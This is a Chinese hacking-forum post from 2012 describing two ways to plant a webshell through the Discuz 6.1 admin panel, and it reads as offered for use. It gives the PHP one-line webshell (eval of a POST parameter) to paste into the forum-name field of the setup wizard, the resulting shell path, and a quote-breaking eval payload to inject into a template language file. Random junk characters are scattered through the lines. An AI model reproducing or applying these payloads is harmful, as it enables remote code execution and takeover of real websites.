中国网络渗透测试联盟

标题: discuz6.1后台拿shell方法 [打印本页]
作者: admin    时间: 2012-9-13 16:59
标题: discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell1 r: i: t/ q7 p
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下! T3 {* v& z* l
1:
3 S. S% w4 C/ Fhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
6 R1 l1 m5 b7 M/ P' }3 C" padmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell, g* Z' M8 N+ x5 H3 v. }" V
<?php eval($_POST[cmd]);?>
2 ^1 P! l! n7 h) M8 T! S0 h0 {后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php8 Q. d& a# a; I% ]6 m8 O: m8 O
3 `  O' E1 U2 L3 s# x, V
" K' N. k' ^  j
2:后台模板管理--默认模板套系--详情: x9 R1 q1 l6 D. ?
templates/default/actions.lang.php
4 Y4 o$ y" d4 q3 I: T# e2 }jhackj\\');eval($_POST[cmd])?>;//" I- T& v, T0 J" R% ~1 Y: h

+ h/ k/ R8 p: _& n1 D+ _) J% D利用很简单,聪明的人一看就懂了



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2